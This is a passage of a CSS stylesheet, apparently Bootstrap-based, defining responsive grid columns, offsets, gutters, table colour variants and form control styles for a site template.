  .row-cols-xl-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-xl-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-xl-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-xl-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-xl-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-xl-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
@media (min-width: 1400px) {
  .col-xxl {
    flex: 1 0 0%;
  }

  .row-cols-xxl-auto > * {
    flex: 0 0 auto;
    width: auto;
  }

  .row-cols-xxl-1 > * {
    flex: 0 0 auto;
    width: 100%;
  }

  .row-cols-xxl-2 > * {
    flex: 0 0 auto;
    width: 50%;
  }

  .row-cols-xxl-3 > * {
    flex: 0 0 auto;
    width: 33.3333333333%;
  }

  .row-cols-xxl-4 > * {
    flex: 0 0 auto;
    width: 25%;
  }

  .row-cols-xxl-5 > * {
    flex: 0 0 auto;
    width: 20%;
  }

  .row-cols-xxl-6 > * {
    flex: 0 0 auto;
    width: 16.6666666667%;
  }
}
.col-auto {
  flex: 0 0 auto;
  width: auto;
}

.col-1 {
  flex: 0 0 auto;
  width: 8.33333333%;
}

.col-2 {
  flex: 0 0 auto;
  width: 16.66666667%;
}

.col-3 {
  flex: 0 0 auto;
  width: 25%;
}

.col-4 {
  flex: 0 0 auto;
  width: 33.33333333%;
}

.col-5 {
  flex: 0 0 auto;
  width: 41.66666667%;
}

.col-6 {
  flex: 0 0 auto;
  width: 50%;
}

.col-7 {
  flex: 0 0 auto;
  width: 58.33333333%;
}

.col-8 {
  flex: 0 0 auto;
  width: 66.66666667%;
}

.col-9 {
  flex: 0 0 auto;
  width: 75%;
}

.col-10 {
  flex: 0 0 auto;
  width: 83.33333333%;
}

.col-11 {
  flex: 0 0 auto;
  width: 91.66666667%;
}

.col-12 {
  flex: 0 0 auto;
  width: 100%;
}

.offset-1 {
  margin-left: 8.33333333%;
}

.offset-2 {
  margin-left: 16.66666667%;
}

.offset-3 {
  margin-left: 25%;
}

.offset-4 {
  margin-left: 33.33333333%;
}

.offset-5 {
  margin-left: 41.66666667%;
}

.offset-6 {
  margin-left: 50%;
}

.offset-7 {
  margin-left: 58.33333333%;
}

.offset-8 {
  margin-left: 66.66666667%;
}

.offset-9 {
  margin-left: 75%;
}

.offset-10 {
  margin-left: 83.33333333%;
}

.offset-11 {
  margin-left: 91.66666667%;
}

.g-0,
.gx-0 {
  --gutter-x: 0;
}

.g-0,
.gy-0 {
  --gutter-y: 0;
}

.g-1,
.gx-1 {
  --gutter-x: 0.25rem;
}

.g-1,
.gy-1 {
  --gutter-y: 0.25rem;
}

.g-2,
.gx-2 {
  --gutter-x: 0.5rem;
}

.g-2,
.gy-2 {
  --gutter-y: 0.5rem;
}

.g-3,
.gx-3 {
  --gutter-x: 1rem;
}

.g-3,
.gy-3 {
  --gutter-y: 1rem;
}

.g-4,
.gx-4 {
  --gutter-x: 1.5rem;
}

.g-4,
.gy-4 {
  --gutter-y: 1.5rem;
}

.g-5,
.gx-5 {
  --gutter-x: 3rem;
}

.g-5,
.gy-5 {
  --gutter-y: 3rem;
}

@media (min-width: 576px) {
  .col-sm-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-sm-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-sm-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-sm-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-sm-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-sm-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-sm-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-sm-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-sm-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-sm-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-sm-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-sm-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-sm-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-sm-0 {
    margin-left: 0;
  }

  .offset-sm-1 {
    margin-left: 8.33333333%;
  }

  .offset-sm-2 {
    margin-left: 16.66666667%;
  }

  .offset-sm-3 {
    margin-left: 25%;
  }

  .offset-sm-4 {
    margin-left: 33.33333333%;
  }

  .offset-sm-5 {
    margin-left: 41.66666667%;
  }

  .offset-sm-6 {
    margin-left: 50%;
  }

  .offset-sm-7 {
    margin-left: 58.33333333%;
  }

  .offset-sm-8 {
    margin-left: 66.66666667%;
  }

  .offset-sm-9 {
    margin-left: 75%;
  }

  .offset-sm-10 {
    margin-left: 83.33333333%;
  }

  .offset-sm-11 {
    margin-left: 91.66666667%;
  }

  .g-sm-0,
.gx-sm-0 {
    --gutter-x: 0;
  }

  .g-sm-0,
.gy-sm-0 {
    --gutter-y: 0;
  }

  .g-sm-1,
.gx-sm-1 {
    --gutter-x: 0.25rem;
  }

  .g-sm-1,
.gy-sm-1 {
    --gutter-y: 0.25rem;
  }

  .g-sm-2,
.gx-sm-2 {
    --gutter-x: 0.5rem;
  }

  .g-sm-2,
.gy-sm-2 {
    --gutter-y: 0.5rem;
  }

  .g-sm-3,
.gx-sm-3 {
    --gutter-x: 1rem;
  }

  .g-sm-3,
.gy-sm-3 {
    --gutter-y: 1rem;
  }

  .g-sm-4,
.gx-sm-4 {
    --gutter-x: 1.5rem;
  }

  .g-sm-4,
.gy-sm-4 {
    --gutter-y: 1.5rem;
  }

  .g-sm-5,
.gx-sm-5 {
    --gutter-x: 3rem;
  }

  .g-sm-5,
.gy-sm-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 768px) {
  .col-md-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-md-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-md-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-md-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-md-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-md-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-md-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-md-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-md-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-md-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-md-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-md-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-md-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-md-0 {
    margin-left: 0;
  }

  .offset-md-1 {
    margin-left: 8.33333333%;
  }

  .offset-md-2 {
    margin-left: 16.66666667%;
  }

  .offset-md-3 {
    margin-left: 25%;
  }

  .offset-md-4 {
    margin-left: 33.33333333%;
  }

  .offset-md-5 {
    margin-left: 41.66666667%;
  }

  .offset-md-6 {
    margin-left: 50%;
  }

  .offset-md-7 {
    margin-left: 58.33333333%;
  }

  .offset-md-8 {
    margin-left: 66.66666667%;
  }

  .offset-md-9 {
    margin-left: 75%;
  }

  .offset-md-10 {
    margin-left: 83.33333333%;
  }

  .offset-md-11 {
    margin-left: 91.66666667%;
  }

  .g-md-0,
.gx-md-0 {
    --gutter-x: 0;
  }

  .g-md-0,
.gy-md-0 {
    --gutter-y: 0;
  }

  .g-md-1,
.gx-md-1 {
    --gutter-x: 0.25rem;
  }

  .g-md-1,
.gy-md-1 {
    --gutter-y: 0.25rem;
  }

  .g-md-2,
.gx-md-2 {
    --gutter-x: 0.5rem;
  }

  .g-md-2,
.gy-md-2 {
    --gutter-y: 0.5rem;
  }

  .g-md-3,
.gx-md-3 {
    --gutter-x: 1rem;
  }

  .g-md-3,
.gy-md-3 {
    --gutter-y: 1rem;
  }

  .g-md-4,
.gx-md-4 {
    --gutter-x: 1.5rem;
  }

  .g-md-4,
.gy-md-4 {
    --gutter-y: 1.5rem;
  }

  .g-md-5,
.gx-md-5 {
    --gutter-x: 3rem;
  }

  .g-md-5,
.gy-md-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 992px) {
  .col-lg-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-lg-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-lg-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-lg-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-lg-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-lg-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-lg-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-lg-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-lg-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-lg-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-lg-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-lg-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-lg-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-lg-0 {
    margin-left: 0;
  }

  .offset-lg-1 {
    margin-left: 8.33333333%;
  }

  .offset-lg-2 {
    margin-left: 16.66666667%;
  }

  .offset-lg-3 {
    margin-left: 25%;
  }

  .offset-lg-4 {
    margin-left: 33.33333333%;
  }

  .offset-lg-5 {
    margin-left: 41.66666667%;
  }

  .offset-lg-6 {
    margin-left: 50%;
  }

  .offset-lg-7 {
    margin-left: 58.33333333%;
  }

  .offset-lg-8 {
    margin-left: 66.66666667%;
  }

  .offset-lg-9 {
    margin-left: 75%;
  }

  .offset-lg-10 {
    margin-left: 83.33333333%;
  }

  .offset-lg-11 {
    margin-left: 91.66666667%;
  }

  .g-lg-0,
.gx-lg-0 {
    --gutter-x: 0;
  }

  .g-lg-0,
.gy-lg-0 {
    --gutter-y: 0;
  }

  .g-lg-1,
.gx-lg-1 {
    --gutter-x: 0.25rem;
  }

  .g-lg-1,
.gy-lg-1 {
    --gutter-y: 0.25rem;
  }

  .g-lg-2,
.gx-lg-2 {
    --gutter-x: 0.5rem;
  }

  .g-lg-2,
.gy-lg-2 {
    --gutter-y: 0.5rem;
  }

  .g-lg-3,
.gx-lg-3 {
    --gutter-x: 1rem;
  }

  .g-lg-3,
.gy-lg-3 {
    --gutter-y: 1rem;
  }

  .g-lg-4,
.gx-lg-4 {
    --gutter-x: 1.5rem;
  }

  .g-lg-4,
.gy-lg-4 {
    --gutter-y: 1.5rem;
  }

  .g-lg-5,
.gx-lg-5 {
    --gutter-x: 3rem;
  }

  .g-lg-5,
.gy-lg-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 1200px) {
  .col-xl-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-xl-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-xl-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-xl-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-xl-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-xl-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-xl-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-xl-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-xl-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-xl-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-xl-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-xl-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-xl-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-xl-0 {
    margin-left: 0;
  }

  .offset-xl-1 {
    margin-left: 8.33333333%;
  }

  .offset-xl-2 {
    margin-left: 16.66666667%;
  }

  .offset-xl-3 {
    margin-left: 25%;
  }

  .offset-xl-4 {
    margin-left: 33.33333333%;
  }

  .offset-xl-5 {
    margin-left: 41.66666667%;
  }

  .offset-xl-6 {
    margin-left: 50%;
  }

  .offset-xl-7 {
    margin-left: 58.33333333%;
  }

  .offset-xl-8 {
    margin-left: 66.66666667%;
  }

  .offset-xl-9 {
    margin-left: 75%;
  }

  .offset-xl-10 {
    margin-left: 83.33333333%;
  }

  .offset-xl-11 {
    margin-left: 91.66666667%;
  }

  .g-xl-0,
.gx-xl-0 {
    --gutter-x: 0;
  }

  .g-xl-0,
.gy-xl-0 {
    --gutter-y: 0;
  }

  .g-xl-1,
.gx-xl-1 {
    --gutter-x: 0.25rem;
  }

  .g-xl-1,
.gy-xl-1 {
    --gutter-y: 0.25rem;
  }

  .g-xl-2,
.gx-xl-2 {
    --gutter-x: 0.5rem;
  }

  .g-xl-2,
.gy-xl-2 {
    --gutter-y: 0.5rem;
  }

  .g-xl-3,
.gx-xl-3 {
    --gutter-x: 1rem;
  }

  .g-xl-3,
.gy-xl-3 {
    --gutter-y: 1rem;
  }

  .g-xl-4,
.gx-xl-4 {
    --gutter-x: 1.5rem;
  }

  .g-xl-4,
.gy-xl-4 {
    --gutter-y: 1.5rem;
  }

  .g-xl-5,
.gx-xl-5 {
    --gutter-x: 3rem;
  }

  .g-xl-5,
.gy-xl-5 {
    --gutter-y: 3rem;
  }
}
@media (min-width: 1400px) {
  .col-xxl-auto {
    flex: 0 0 auto;
    width: auto;
  }

  .col-xxl-1 {
    flex: 0 0 auto;
    width: 8.33333333%;
  }

  .col-xxl-2 {
    flex: 0 0 auto;
    width: 16.66666667%;
  }

  .col-xxl-3 {
    flex: 0 0 auto;
    width: 25%;
  }

  .col-xxl-4 {
    flex: 0 0 auto;
    width: 33.33333333%;
  }

  .col-xxl-5 {
    flex: 0 0 auto;
    width: 41.66666667%;
  }

  .col-xxl-6 {
    flex: 0 0 auto;
    width: 50%;
  }

  .col-xxl-7 {
    flex: 0 0 auto;
    width: 58.33333333%;
  }

  .col-xxl-8 {
    flex: 0 0 auto;
    width: 66.66666667%;
  }

  .col-xxl-9 {
    flex: 0 0 auto;
    width: 75%;
  }

  .col-xxl-10 {
    flex: 0 0 auto;
    width: 83.33333333%;
  }

  .col-xxl-11 {
    flex: 0 0 auto;
    width: 91.66666667%;
  }

  .col-xxl-12 {
    flex: 0 0 auto;
    width: 100%;
  }

  .offset-xxl-0 {
    margin-left: 0;
  }

  .offset-xxl-1 {
    margin-left: 8.33333333%;
  }

  .offset-xxl-2 {
    margin-left: 16.66666667%;
  }

  .offset-xxl-3 {
    margin-left: 25%;
  }

  .offset-xxl-4 {
    margin-left: 33.33333333%;
  }

  .offset-xxl-5 {
    margin-left: 41.66666667%;
  }

  .offset-xxl-6 {
    margin-left: 50%;
  }

  .offset-xxl-7 {
    margin-left: 58.33333333%;
  }

  .offset-xxl-8 {
    margin-left: 66.66666667%;
  }

  .offset-xxl-9 {
    margin-left: 75%;
  }

  .offset-xxl-10 {
    margin-left: 83.33333333%;
  }

  .offset-xxl-11 {
    margin-left: 91.66666667%;
  }

  .g-xxl-0,
.gx-xxl-0 {
    --gutter-x: 0;
  }

  .g-xxl-0,
.gy-xxl-0 {
    --gutter-y: 0;
  }

  .g-xxl-1,
.gx-xxl-1 {
    --gutter-x: 0.25rem;
  }

  .g-xxl-1,
.gy-xxl-1 {
    --gutter-y: 0.25rem;
  }

  .g-xxl-2,
.gx-xxl-2 {
    --gutter-x: 0.5rem;
  }

  .g-xxl-2,
.gy-xxl-2 {
    --gutter-y: 0.5rem;
  }

  .g-xxl-3,
.gx-xxl-3 {
    --gutter-x: 1rem;
  }

  .g-xxl-3,
.gy-xxl-3 {
    --gutter-y: 1rem;
  }

  .g-xxl-4,
.gx-xxl-4 {
    --gutter-x: 1.5rem;
  }

  .g-xxl-4,
.gy-xxl-4 {
    --gutter-y: 1.5rem;
  }

  .g-xxl-5,
.gx-xxl-5 {
    --gutter-x: 3rem;
  }

  .g-xxl-5,
.gy-xxl-5 {
    --gutter-y: 3rem;
  }
}
.table {
  --table-bg: var(--white);
  --table-accent-bg: transparent;
  --table-striped-color: var(--template-text-dark);
  --table-striped-bg: rgba(0, 0, 0, 0.05);
  --table-active-color: var(--template-text-dark);
  --table-active-bg: rgba(0, 0, 0, 0.1);
  --table-hover-color: var(--template-text-dark);
  --table-hover-bg: rgba(0, 0, 0, 0.075);
  width: 100%;
  margin-bottom: 1rem;
  color: var(--template-text-dark);
  vertical-align: top;
  border-color: #dee2e6;
}
.table > :not(caption) > * > * {
  padding: 0.75rem 1rem;
  background-color: var(--table-bg);
  border-bottom-width: 1px;
  box-shadow: inset 0 0 0 9999px var(--table-accent-bg);
}
.table > tbody {
  vertical-align: inherit;
}
.table > thead {
  vertical-align: bottom;
}
.table > :not(:last-child) > :last-child > * {
  border-bottom-color: #dee2e6;
}

.caption-top {
  caption-side: top;
}

.table-sm > :not(caption) > * > * {
  padding: 0.3rem 0.3rem;
}

.table-bordered > :not(caption) > * {
  border-width: 1px 0;
}
.table-bordered > :not(caption) > * > * {
  border-width: 0 1px;
}

.table-borderless > :not(caption) > * > * {
  border-bottom-width: 0;
}

.table-striped > tbody > tr:nth-of-type(odd) {
  --table-accent-bg: var(--table-striped-bg);
  color: var(--table-striped-color);
}

.table-active {
  --table-accent-bg: var(--table-active-bg);
  color: var(--table-active-color);
}

.table-hover > tbody > tr:hover {
  --table-accent-bg: var(--table-hover-bg);
  color: var(--table-hover-color);
}

.table-primary {
  --table-bg: #d4e1f1;
  --table-striped-bg: #c9d6e5;
  --table-striped-color: #000;
  --table-active-bg: #bfcbd9;
  --table-active-color: #000;
  --table-hover-bg: #c4d0df;
  --table-hover-color: #000;
  color: #000;
  border-color: #bfcbd9;
}

.table-secondary {
  --table-bg: #e0e2e4;
  --table-striped-bg: #d5d7d9;
  --table-striped-color: #000;
  --table-active-bg: #cacbcd;
  --table-active-color: #000;
  --table-hover-bg: #cfd1d3;
  --table-hover-color: #000;
  color: #000;
  border-color: #cacbcd;
}

.table-success {
  --table-bg: #dae5dd;
  --table-striped-bg: #cfdad2;
  --table-striped-color: #000;
  --table-active-bg: #c4cec7;
  --table-active-color: #000;
  --table-hover-bg: #cad4cc;
  --table-hover-color: #000;
  color: #000;
  border-color: #c4cec7;
}

.table-info {
  --table-bg: #d4e1f1;
  --table-striped-bg: #c9d6e5;
  --table-striped-color: #000;
  --table-active-bg: #bfcbd9;
  --table-active-color: #000;
  --table-hover-bg: #c4d0df;
  --table-hover-color: #000;
  color: #000;
  border-color: #bfcbd9;
}

.table-warning {
  --table-bg: #fff0d0;
  --table-striped-bg: #f2e4c6;
  --table-striped-color: #000;
  --table-active-bg: #e6d8bb;
  --table-active-color: #000;
  --table-hover-bg: #ecdec0;
  --table-hover-color: #000;
  color: #000;
  border-color: #e6d8bb;
}

.table-danger {
  --table-bg: #f3d4d4;
  --table-striped-bg: #e7c9c9;
  --table-striped-color: #000;
  --table-active-bg: #dbbfbf;
  --table-active-color: #000;
  --table-hover-bg: #e1c4c4;
  --table-hover-color: #000;
  color: #000;
  border-color: #dbbfbf;
}

.table-light {
  --table-bg: #f8f9fa;
  --table-striped-bg: #ecedee;
  --table-striped-color: #000;
  --table-active-bg: #dfe0e1;
  --table-active-color: #000;
  --table-hover-bg: #e5e6e7;
  --table-hover-color: #000;
  color: #000;
  border-color: #dfe0e1;
}

.table-dark {
  --table-bg: #212529;
  --table-striped-bg: #2c3034;
  --table-striped-color: #fff;
  --table-active-bg: #373b3e;
  --table-active-color: #fff;
  --table-hover-bg: #323539;
  --table-hover-color: #fff;
  color: #fff;
  border-color: #373b3e;
}

.table-responsive {
  overflow-x: auto;
  -webkit-overflow-scrolling: touch;
}

@media (max-width: 575.98px) {
  .table-responsive-sm {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 767.98px) {
  .table-responsive-md {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 991.98px) {
  .table-responsive-lg {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 1199.98px) {
  .table-responsive-xl {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
@media (max-width: 1399.98px) {
  .table-responsive-xxl {
    overflow-x: auto;
    -webkit-overflow-scrolling: touch;
  }
}
.form-label {
  margin-bottom: 0.5rem;
}

.col-form-label {
  padding-top: calc(0.5rem + 1px);
  padding-bottom: calc(0.5rem + 1px);
  margin-bottom: 0;
  font-size: inherit;
  line-height: 1.5;
}

.col-form-label-lg {
  padding-top: calc(0.5rem + 1px);
  padding-bottom: calc(0.5rem + 1px);
  font-size: 1.25rem;
}

.col-form-label-sm {
  padding-top: calc(0.25rem + 1px);
  padding-bottom: calc(0.25rem + 1px);
  font-size: 0.8rem;
}

.form-text {
  margin-top: 0.25rem;
  font-size: 0.875em;
  color: #666e76;
}

.form-control {
  display: block;
  width: 100%;
  padding: 0.5rem 1rem;
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid #cdcdcd;
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-control {
    transition: none;
  }
}
.form-control[type=file] {
  overflow: hidden;
}
.form-control[type=file]:not(:disabled):not([readonly]) {
  cursor: pointer;
}
.form-control:focus {
  color: var(--template-text-dark);
  background-color: #fff;
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-control::-webkit-date-and-time-value {
  height: 1.5em;
}
.form-control::-webkit-input-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control::-moz-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control::-ms-input-placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control::placeholder {
  color: #666e76;
  opacity: 1;
}
.form-control:disabled, .form-control[readonly] {
  background-color: #e8e8e8;
  opacity: 1;
}
.form-control::file-selector-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
  color: var(--white);
  background-color: #132f53;
  pointer-events: none;
  border-color: inherit;
  border-style: solid;
  border-width: 0;
  border-inline-end-width: 1px;
  border-radius: 0;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-control::file-selector-button {
    transition: none;
  }
}
.form-control:hover:not(:disabled):not([readonly])::file-selector-button {
  background-color: #122d4f;
}
.form-control::-webkit-file-upload-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
  color: var(--white);
  background-color: #132f53;
  pointer-events: none;
  border-color: inherit;
  border-style: solid;
  border-width: 0;
  border-inline-end-width: 1px;
  border-radius: 0;
  -webkit-transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-control::-webkit-file-upload-button {
    -webkit-transition: none;
    transition: none;
  }
}
.form-control:hover:not(:disabled):not([readonly])::-webkit-file-upload-button {
  background-color: #122d4f;
}

.form-control-plaintext {
  display: block;
  width: 100%;
  padding: 0.5rem 0;
  margin-bottom: 0;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: transparent;
  border: solid transparent;
  border-width: 1px 0;
}
.form-control-plaintext.form-control-sm, .form-control-plaintext.form-control-lg {
  padding-right: 0;
  padding-left: 0;
}

.form-control-sm {
  min-height: calc(1.5em + (0.5rem + 2px));
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
  border-radius: 0.2rem;
}
.form-control-sm::file-selector-button {
  padding: 0.25rem 0.5rem;
  margin: -0.25rem -0.5rem;
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}
.form-control-sm::-webkit-file-upload-button {
  padding: 0.25rem 0.5rem;
  margin: -0.25rem -0.5rem;
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.form-control-lg {
  min-height: calc(1.5em + (1rem + 2px));
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  border-radius: 0.3rem;
}
.form-control-lg::file-selector-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
}
.form-control-lg::-webkit-file-upload-button {
  padding: 0.5rem 1rem;
  margin: -0.5rem -1rem;
  -webkit-margin-end: 1rem;
          margin-inline-end: 1rem;
}

textarea.form-control {
  min-height: calc(1.5em + (1rem + 2px));
}
textarea.form-control-sm {
  min-height: calc(1.5em + (0.5rem + 2px));
}
textarea.form-control-lg {
  min-height: calc(1.5em + (1rem + 2px));
}

.form-control-color {
  max-width: 3rem;
  height: auto;
  padding: 0.5rem;
}
.form-control-color:not(:disabled):not([readonly]) {
  cursor: pointer;
}
.form-control-color::-moz-color-swatch {
  height: 1.5em;
  border-radius: 0.25rem;
}
.form-control-color::-webkit-color-swatch {
  height: 1.5em;
  border-radius: 0.25rem;
}

.form-select, .custom-select {
  display: block;
  width: 100%;
  padding: 0.5rem 3rem 0.5rem 1rem;
  -moz-padding-start: calc(1rem - 3px);
  font-size: 1rem;
  font-weight: 400;
  line-height: 1.5;
  color: var(--template-text-dark);
  background-color: var(--template-bg-light);
  background-image: url("../images/select-bg.svg");
  background-repeat: no-repeat;
  background-position: right 1rem center;
  background-size: 116rem;
  border: 1px solid #cdcdcd;
  border-radius: 0.25rem;
  transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
}
@media (prefers-reduced-motion: reduce) {
  .form-select, .custom-select {
    transition: none;
  }
}
.form-select:focus, .custom-select:focus {
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-select[multiple], [multiple].custom-select, .form-select[size]:not([size="1"]), [size].custom-select:not([size="1"]) {
  padding-right: 1rem;
  background-image: none;
}
.form-select:disabled, .custom-select:disabled {
  background-color: #e8e8e8;
}
.form-select:-moz-focusring, .custom-select:-moz-focusring {
  color: transparent;
  text-shadow: 0 0 0 var(--template-text-dark);
}

.form-select-sm {
  padding-top: 0.25rem;
  padding-bottom: 0.25rem;
  padding-left: 0.5rem;
  font-size: 0.8rem;
}

.form-select-lg {
  padding-top: 0.5rem;
  padding-bottom: 0.5rem;
  padding-left: 1rem;
  font-size: 1.25rem;
}

.form-check {
  display: block;
  min-height: 1.5rem;
  padding-left: 1.5em;
  margin-bottom: 0.125rem;
}
.form-check .form-check-input {
  float: left;
  margin-left: -1.5em;
}

.form-check-input {
  width: 1em;
  height: 1em;
  margin-top: 0.25em;
  vertical-align: top;
  background-color: #fff;
  background-repeat: no-repeat;
  background-position: center;
  background-size: contain;
  border: 1px solid rgba(0, 0, 0, 0.25);
  -webkit-appearance: none;
     -moz-appearance: none;
          appearance: none;
  -webkit-print-color-adjust: exact;
          color-adjust: exact;
}
.form-check-input[type=checkbox] {
  border-radius: 0.25em;
}
.form-check-input[type=radio] {
  border-radius: 50%;
}
.form-check-input:active {
  -webkit-filter: brightness(90%);
          filter: brightness(90%);
}
.form-check-input:focus {
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}
.form-check-input:checked {
  background-color: #2a69b7;
  border-color: #2a69b7;
}
.form-check-input:checked[type=checkbox] {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3e%3cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10l3 3l6-6'/%3e%3c/svg%3e");
}
.form-check-input:checked[type=radio] {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='2' fill='%23fff'/%3e%3c/svg%3e");
}
.form-check-input[type=checkbox]:indeterminate {
  background-color: #2a69b7;
  border-color: #2a69b7;
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20'%3e%3cpath fill='none' stroke='%23fff' stroke-linecap='round' stroke-linejoin='round' stroke-width='3' d='M6 10h8'/%3e%3c/svg%3e");
}
.form-check-input:disabled {
  pointer-events: none;
  -webkit-filter: none;
          filter: none;
  opacity: 0.5;
}
.form-check-input[disabled] ~ .form-check-label, .form-check-input:disabled ~ .form-check-label {
  opacity: 0.5;
}

.form-switch {
  padding-left: 2.5em;
}
.form-switch .form-check-input {
  width: 2em;
  margin-left: -2.5em;
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='rgba%280, 0, 0, 0.25%29'/%3e%3c/svg%3e");
  background-position: left center;
  border-radius: 2em;
  transition: background-position 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .form-switch .form-check-input {
    transition: none;
  }
}
